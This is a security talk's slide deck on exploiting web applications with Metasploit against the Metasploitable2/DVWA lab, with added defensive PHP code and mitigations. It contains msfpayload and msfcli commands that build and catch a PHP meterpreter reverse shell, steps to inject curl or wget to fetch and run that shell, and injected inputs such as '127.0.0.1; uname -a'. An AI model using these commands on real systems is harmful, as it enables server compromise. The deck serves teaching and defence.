Introduction to Metasploit: Exploiting Web Applications

Dennis Maldonado

@DennisMald


Dennis Maldonado

  • Application Security Specialist

    • WhiteHat Security

  • Full-Time Student

    • University of Houston – Main Campus

      • Computer Information Systems Major

  • Twitter

    • @DennisMald

  • Website / Blog

    • KernelMeltdown.org


Tools

  • Kali Linux – Our attacker machine

  • Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.

  • Metasploitable2 – Victim Web Server


Topic of the day

Exploiting the backend server through a web application.


What’s the problem?

  • Reasons why hackers want to compromise the server:

    • Run attacks against the internal network

    • Use the server as a bot

    • Install backdoors onto the server

    • Reveal sensitive files/passwords

    • Execute any local file

    • Execute remote files

    • and more…


What’s the problem?

  • Vulnerabilities that are dangerous against a server

    • Directory Traversal

    • Local File Inclusion

    • Remote File Inclusion

    • Remote Code Execution

    • SQL Injection

    • Command Injection


Directory Traversal

http://website.com/?page=index.php


Local File Inclusion

http://website.com/?page=index.php


Remote File Inclusion

http://website.com/?page=index.php


Remote Code Execution

http://website.com/


SQL Injection

http://website.com/user.php?id=1&Submit=Submit#


Command Injection


Metasploit Basics


The Metasploit Project

  • Metasploit is an open-source framework used for security development and testing

    • Information gathering and fingerprinting

    • Exploitation/Penetration testing

    • Payload generation and encoding

    • Fuzzing

    • And much more…


Metasploit Interfaces

  • Command Line Interfaces

    • msfconsole

    • msfcli

  • GUI Interfaces

    • Metasploit Community Edition

    • Armitage


Metasploit Modules

  • Modules

    • Exploit – Exploitation/Proof-of-Concept code

      • Ruby on Rails exploit

      • PHP-CGI exploit

    • Auxiliary – Misc. modules for multiple purposes

      • Scanners

      • DDoS tools

      • Fingerprinting

      • Clients

    • Payloads – Code to be executed on the exploited system

      • System Shells

      • Meterpreter Shells

    • Post – Modules for post-exploitation tasks

      • Persistence

      • Password Stealing

      • Pivoting


Exploits

  • Active Exploits

    • Actively exploit a host.

    • Ex: Ruby on Rails XML exploit

  • Passive Exploits

    • Waits for incoming hosts, then exploits them

    • Ex: Java 0-days

  • Exploits contain payloads


Payloads

  • Inline (Non Staged)

    • Payload containing the exploit and shellcode

    • Stable

    • Large size

  • Staged

    • Exploits victim, establishes connection with attacker, pulls down the payload

  • Meterpreter

    • Advanced, dynamic payload.

    • Extended over the network

    • Extensible through modules and plugins


Payloads continued

  • Types of connections

    • Bind

      • Local server gets started on victim machine

      • Attacker connects to victim

      • windows/x64/shell/bind_tcp

    • Reverse

      • Local server gets started on attacker machine

      • Victim connects to attacker

      • windows/x64/shell/reverse_tcp


Vulnerabilities and Exploit Examples


PHP-CGI Argument Injection

  • CVE-2012-1823

  • DoS attack

    • -T 10000

  • Source code disclosure

    • -s argument

  • Remote Code Execution

    • -d argument
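
The three arguments listed above share one root cause: when PHP runs as CGI, a query string with no literal "=" is split on "+" and handed to php-cgi as command-line options. The following detection routine is an added example (not from the talk) that scans access-log lines for that pattern; the log lines are constructed samples, and the log format is assumed to be Apache combined format.

```php
<?php
// Added example, not from the talk: flag access-log lines whose query string
// would reach php-cgi as argv (the CVE-2012-1823 pattern). With no literal "="
// in the query string, the server splits it on "+" and passes the pieces as
// arguments, so a token starting with "-" selects a PHP CLI option (-s, -d, -T).
function php_cgi_argv_tokens(string $uri): array
{
    $qpos = strpos($uri, '?');
    if ($qpos === false) {
        return [];
    }
    $raw = substr($uri, $qpos + 1);
    // A literal "=" anywhere means the server treats it as ordinary form data.
    if ($raw === '' || strpos($raw, '=') !== false) {
        return [];
    }
    $flags = [];
    foreach (explode('+', $raw) as $token) {
        $decoded = rawurldecode($token);   // "%3d" becomes "=" only after the split
        if ($decoded !== '' && $decoded[0] === '-') {
            $flags[] = $decoded;
        }
    }
    return $flags;
}
// Scan combined-format log lines; returns [index => flagged tokens] for hits.
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        // The request field is the quoted "METHOD URI PROTOCOL" section.
        if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $flags = php_cgi_argv_tokens($m[1]);
        if ($flags) {
            $hits[$i] = $flags;
        }
    }
    return $hits;
}
// Constructed sample log lines (not real traffic); the last three are attempts.
$sample = [
    '10.0.0.5 - - [01/Jan/2013:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2013:10:00:01 +0000] "GET /index.php?-s HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2013:10:00:02 +0000] "POST /index.php?-d+allow_url_include%3d1 HTTP/1.1" 200 77',
    '10.0.0.9 - - [01/Jan/2013:10:00:03 +0000] "GET /index.php?-T+10000 HTTP/1.1" 200 0',
];
foreach (scan_access_log($sample) as $n => $flags) {
    echo "line $n: php-cgi argument injection attempt: " . implode(' ', $flags) . "\n";
}
```

The first sample line carries "page=home" and is ignored; the other three are reported with the option tokens that would have reached php-cgi.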


Ruby on Rails XML Parameter Parsing Vulnerability

  • CVE-2013-0156

  • Easy to find, easy to exploit, critical vulnerability.

  • Requires just one POST request containing specially crafted XML data.

  • Send commands through YAML objects


Unrestricted File Upload

  • The upload functionality allows for any file type to be uploaded

    • Upload server-side code and check if it executes

      • PHP = <?php echo "Hello World!"; ?>

      • ASP = <% Response.Write "Hello World!" %>

      • JSP = <%= new java.util.Date().toString() %>

    • Use msfpayload to create a shell

    • Use msfcli to listen for a connection from the victim

    • Upload the shell and execute it


Command Injection

  • Allows an attacker to execute system-level commands.

    • Attempt a safe command

      • echo test

      • uname -a

    • Use msfpayload to create a shell

    • Use msfcli to listen for a connection from the victim

    • Inject curl or wget commands to download the shell onto the victim machine.

    • Chmod if necessary and execute
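
The "safe command" test on this slide works because user input reaches a shell unchanged. The snippet below is an added example (not from the talk) showing that pattern next to a hardened version for a "ping this host" feature of the kind DVWA offers; the ping command and the function names are assumptions.

```php
<?php
// Added example, not from the talk: the pattern behind the Command Injection
// slide beside a hardened version. Same "ping -c 1" command in both.

// VULNERABLE: user input is spliced straight into a shell command line, so an
// input such as "127.0.0.1; uname -a" runs uname -a on the server.
function ping_vulnerable(string $host): string
{
    return (string) shell_exec('ping -c 1 ' . $host);
}

// HARDENED: (1) accept only the exact shape we expect, an IP address, and
// (2) pass it as one quoted argument. Input that is not an IP is rejected
// before any command runs, and quoting strips shell metacharacter meaning.
// Better still, as the Mitigations slide says, prefer a library call (for
// reachability, a socket connect) over spawning a shell at all.
function ping_hardened(string $host): string
{
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException("not an IP address: $host");
    }
    return (string) shell_exec('ping -c 1 ' . escapeshellarg($host));
}

// Demonstration on constructed inputs. Only ping_hardened is called;
// ping_vulnerable is kept for contrast and is never given these inputs.
foreach (['127.0.0.1', '127.0.0.1; uname -a', '$(id)'] as $input) {
    try {
        ping_hardened($input);
        echo "accepted: $input\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: {$e->getMessage()}\n";
    }
}
```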


Commands used (note: IP addresses and ports may be different)

  • msfpayload php/meterpreter/reverse_tcp O

  • msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O

  • msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php

  • # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.

  • ==================================

  • msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E


Mitigations and Closing


Mitigations

  • Keep software up to date!

    • PHP: 5.4.3, 5.3.13

    • Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15

  • Use whitelisting for file upload extensions

    • Watch for extensions and content-types

    • Don’t let upload directory be executable

    • Rename files if possible

  • Don’t pass user input as a system command!

    • Use library calls when possible

    • Sanitize input
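
The file-upload points on this slide, applied one by one in an upload handler, as an added example (not from the talk): UPLOAD_DIR, the allow-list and the form field name are assumptions, and the directory is taken to sit outside the web root with no PHP handler mapped to it.

```php
<?php
// Added example, not from the talk: an upload handler applying the Mitigations
// slide's file-upload points. UPLOAD_DIR and ALLOWED are assumptions.
const UPLOAD_DIR = '/var/app/uploads';   // outside DocumentRoot, no PHP handler
const ALLOWED = [                        // extension => MIME type the bytes must have
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'pdf'  => 'application/pdf',
];

// Stores one entry of $_FILES and returns the new path; throws on any failure.
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // 1. Whitelist the extension. Only the final extension counts, lower-cased,
    //    and the original filename never appears in the stored path.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException("extension not allowed: $ext");
    }
    // 2. Check the content type from the file bytes, not the client's header:
    //    a PHP script named "x.png" fails here even though the extension passed.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content does not match .$ext: $mime");
    }
    // 3. Rename to a random name the uploader can neither choose nor predict.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // 4. Keep the upload directory non-executable: it is outside DocumentRoot,
    //    the file is stored without execute bits, and it is served back by a
    //    read-only download handler rather than executed in place.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $dest;
}

// Usage from the form handler (assumed form field name "file"):
// $path = store_upload($_FILES['file']);
```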


Questions? Comments?


Sources

  • BackTrack-Linux

    • http://www.kali.org/

  • The Metasploit Project

    • http://www.metasploit.com/

  • Metasploit Unleashed

    • http://www.offensive-security.com/metasploit-unleashed/

  • PHP-CGI Advisory

    • http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

  • Ruby on Rails Exploitation

    • https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156

  • Damn Vulnerable Web Application (DVWA)

    • http://www.dvwa.co.uk/

  • Metasploitable 2

    • http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web
